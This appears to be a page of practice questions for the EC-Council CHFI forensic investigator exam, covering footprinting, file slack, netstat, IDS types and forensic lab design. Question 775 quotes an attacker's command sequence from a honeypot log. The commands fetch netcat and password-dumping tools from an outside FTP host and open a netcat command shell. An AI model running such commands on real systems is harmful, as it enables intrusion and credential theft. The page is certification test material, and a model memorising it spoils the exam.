312-49V10 Exam Details

  • Exam Code: 312-49V10
  • Exam Name: EC-Council Certified Computer Hacking Forensic Investigator (V10)
  • Certification: EC-COUNCIL Certifications
  • Vendor: EC-COUNCIL
  • Total Questions: 1028 Q&As
  • Last Updated: May 31, 2026

EC-COUNCIL 312-49V10 Online Questions & Answers

  • Question 771:

    You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to sensitive information about the company clients. You have rummaged through their trash and found very little information. You do not want to set off any alarms on their network, so you plan on performing passive footprinting against their Web servers. What tool should you use?

    A. Dig
    B. Ping sweep
    C. Netcraft
    D. Nmap

  • Question 772:

    In a forensic examination of hard drives for digital evidence, what type of user is most likely to have the most file slack to analyze?

    A. one who has NTFS 4 or 5 partitions
    B. one who uses dynamic swap file capability
    C. one who uses hard disk writes on IRQ 13 and 21
    D. one who has lots of allocation units per block or cluster

  • Question 773:

    You are asked to build a forensic lab and your manager has specifically informed you to use copper for lining the walls, ceilings, and floor. What is the main purpose of lining the walls, ceilings, and floor with copper?

    A. To control the room temperature
    B. To strengthen the walls, ceilings, and floor
    C. To avoid electromagnetic emanations
    D. To make the lab sound proof

  • Question 774:

    Netstat is a tool for collecting information regarding network connections. It provides a simple view of TCP and UDP connections, and their state and network traffic statistics. Which of the following commands shows you the TCP and UDP network connections, listening ports, and the identifiers?

    A. netstat -ano
    B. netstat -b
    C. netstat -r
    D. netstat -s

  • Question 775:

    The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

    He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query which results in the commands run as shown below.

    "cmd1.exe /c open 213.116.251.162 >ftpcom"

    "cmd1.exe /c echo johna2k >>ftpcom"

    "cmd1.exe /c echo haxedj00 >>ftpcom"

    "cmd1.exe /c echo get nc.exe >>ftpcom"

    "cmd1.exe /c echo get pdump.exe >>ftpcom"

    "cmd1.exe /c echo get samdump.dll >>ftpcom"

    "cmd1.exe /c echo quit >>ftpcom"

    "cmd1.exe /c ftp -s:ftpcom"

    "cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

    What can you infer from the exploit given?

    A. It is a local exploit where the attacker logs in using username johna2k
    B. There are two attackers on the system - johna2k and haxedj00
    C. The attack is a remote exploit and the hacker downloads three files
    D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

  • Question 776:

    After passively scanning the network of Department of Defense (DoD), you switch over to active scanning to identify live hosts on their network. DoD is a large organization and should respond to any number of scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts respond to your ICMP pings; definitely not the number of hosts you were expecting.

    Why did this ping sweep only produce a few responses?

    A. Only IBM AS/400 will reply to this scan
    B. Only Windows systems will reply to this scan
    C. Only Unix and Unix-like systems will reply to this scan
    D. A switched network will not respond to packets sent to the broadcast address

  • Question 777:

    An intrusion detection system (IDS) gathers and analyzes information from within a computer or a network to identify any possible violations of security policy, including unauthorized access, as well as misuse. Which of the following intrusion detection systems audit events that occur on a specific host?

    A. Network-based intrusion detection
    B. Host-based intrusion detection
    C. Log file monitoring
    D. File integrity checking

  • Question 778:

    When investigating a wireless attack, what information can be obtained from the DHCP logs?

    A. The operating system of the attacker and victim computers
    B. IP traffic between the attacker and the victim
    C. MAC address of the attacker
    D. If any computers on the network are running in promiscuous mode

  • Question 779:

    What is the location of the binary files required for the functioning of the OS in a Linux system?

    A. /run
    B. /bin
    C. /root
    D. /sbin

  • Question 780:

    You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved.

    What should you examine next in this case?

    A. The registry
    B. The swapfile
    C. The recycle bin
    D. The metadata
